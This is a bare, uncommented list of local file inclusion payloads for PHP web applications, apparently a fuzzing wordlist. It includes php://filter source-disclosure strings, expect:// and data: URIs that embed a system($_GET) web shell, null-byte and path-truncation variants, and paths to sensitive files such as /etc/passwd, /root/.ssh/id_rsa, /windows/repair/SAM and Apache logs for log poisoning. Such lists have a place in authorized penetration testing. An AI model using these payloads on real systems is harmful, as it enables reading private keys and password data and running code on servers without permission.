php://filter/convert.base64-encode/resource=index
/proc/self/environ
/proc/self/environ%00
/proc/self/environ/././
/etc/passwd
/etc/passwd/././
/etc/passwd%00
/etc/passwd%2500
tc/passwd........................................................................................
expect://ls
/etc/my.cnf
/etc/my.cnf%00
/etc/my.cnf/././
data:text/plain,<?system($_GET['x']);?>&x=ls
data:,<?system($_GET['x']);?>&x=ls
data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log%00
/var/log/apache2/access.log
/var/log/apache2/access.log%00
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache2/error.log%00
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log%00
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache/error.log%00
/var/log/error_log
/var/log/error.log%00
/var/www/logs/error_log
/etc/lsb-release
/var/www/logs/error.log%00
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
/proc/self/fd/
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/usr/local/etc/apache2/httpd.conf
/var/lib/mysql/mysql/user.frm
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/etc/ssh/ssh_config
